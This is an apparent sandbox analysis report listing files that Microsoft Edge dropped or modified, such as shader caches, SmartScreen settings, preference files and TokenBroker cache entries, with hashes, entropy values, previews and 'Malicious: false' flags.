SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlSpl/:Ls3Spt
MD5:	31BC807E9B8FDFCC50F3B88405AAA810
SHA1:	A8741B97EF1E2300F570FF527E4740E7F58B94D2
SHA-256:	D271F26BAF82D9E813EBB2D9E1F8BE33AE5E79C87987D2A67A8D6F2BA8874E22
SHA-512:	EE9DFDDFC9CA1F4E6C4D26BA5761159514FD9BDECBB95E11A9621BFA05558CFB5146212CDBEB76853332A9C73C1CFBFF07380659E212A3B559515D4B90E7A31C
Malicious:	false
Preview:	........................................'..<../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.998137551804622
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclUTLWn:YWLSGTt1o9LuLgfGBPAzkVj/T8lUOn
MD5:	F53CE943CF38DC9CE4DB1F79E0EE5EB8
SHA1:	25954550F4A67CA675A20735E88ED2A7A34ECE12
SHA-256:	8AF71EEB05E448C074E2FA0ED2A57CCE04EE61BBCB86FCAC50246B470E90BC13
SHA-512:	D95FE40E51634F7AB60550AB767541048015C44659DD92410702A46B9769A3FDAEFEBEA3315FD96EECE978455C7241B214F00C880C900EFB81D0F04C5965128F
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731311718397352}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d30d0f72-ab93-4e72-9b58-5f90557a71ed.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45947
Entropy (8bit):	6.087166722549042
Encrypted:	false
SSDEEP:	768:+MkbJrT8IeQcrQgF9swnSu4hDO6vP6OimrhgX6PdIPRqXcpYL+CAo5Goup1Xl3jm:+Mk1rT8Hl9swD6CY/cp1Ro5hu3VlXr4/
MD5:	AD992D888E8059148E5E975073516357
SHA1:	6D2093858243B52ED87018D53B14809518B7F6D8
SHA-256:	E8342D2424D20DB35876574FD09175F29998AC00E29269355D24EF7D0C43C03B
SHA-512:	D5B5859A9B832A7F087C64A7CDD5DC570642F8247EDE8C56A1571316AAF3D29FD0C3A4D10E3314ED6E556C20B4E2D78A799308B81EF7A7A7AF66A2B0E9597789
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731210918"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e2375762-3da9-4aa6-b358-65f3abd5a5e4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44604
Entropy (8bit):	6.096226339062828
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBAwu7hDO6vP6OimrlQFhAFfuFD68cGoup1Xl3jVz6:z/Ps+wsI7ynE/6CYD8chu3VlXr4CRo1
MD5:	6CA8513EF456610E32F86D7C76A0B7BD
SHA1:	877A933D6D4706285DCDDA386170F43F50874818
SHA-256:	45DF3FFEE4993AA5D9833F30CC115EE26811C469BAADCCA2F67CF2FD8003D797
SHA-512:	8701B73F07C0FE2F36E390458CB020F646169B3A1E216C24F189BB9D5B72BCC813E969383CCAEE6CAFE67ECFF459F7A286ECFC22A04C21C252C9E1EEACEDF74C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fd77c380-4929-40fb-b934-2ef271f00705.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.831941829316232
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxHxl9Il8u2fRUA3wGKQoN+bQuZQg12zBDid1rc:muYs93rqu712zBDB
MD5:	3F9438DC9D167246E7279E3D1A21AEE5
SHA1:	85C0C768564FBD92745576402BE0638FA301E9FB
SHA-256:	73569E024E7922B9122447E0B5056ABE184D364A1D741AEB496D89D6892A5FE7
SHA-512:	AADBAB4EA59C7E2FCA56659E17073ECEA23602F531B88FD9B27E5862831D0123D02FDAD20DF758D4C1C6E619E85B758DC823E64FE7CFA352271D0ABCD9725552
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.B.W.Y.v.S.w.z.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.c./.Z.r.+.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.995237246001488
Encrypted:	false
SSDEEP:	96:dYsTYGzwXoKb4+sYcLRqRFtHs/xBCvhb5U9iD:d3YGE46cIxMPqbU9iD
MD5:	6D9DCDE1E62E060AF7D90CC3EC874202
SHA1:	A1994B12C25135296A2E0F404570B80CAA429AD1
SHA-256:	00EB433DD75A4BF3B1018BE4F9987DFC5FE28AA4123F857B86F68C514AB797BD
SHA-512:	9A7E4FF7BAA788A5E3A6EE0D9C81D4E13C92BCF827EDFF85E1FF839F20AB2457A913C77E084D9CF52D94D618578D3ABF282BAA4D7BCCBC7A7F0F2F89A3945297
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".v.l.k.C.o.y.Q.z.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.c./.Z.r.+.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
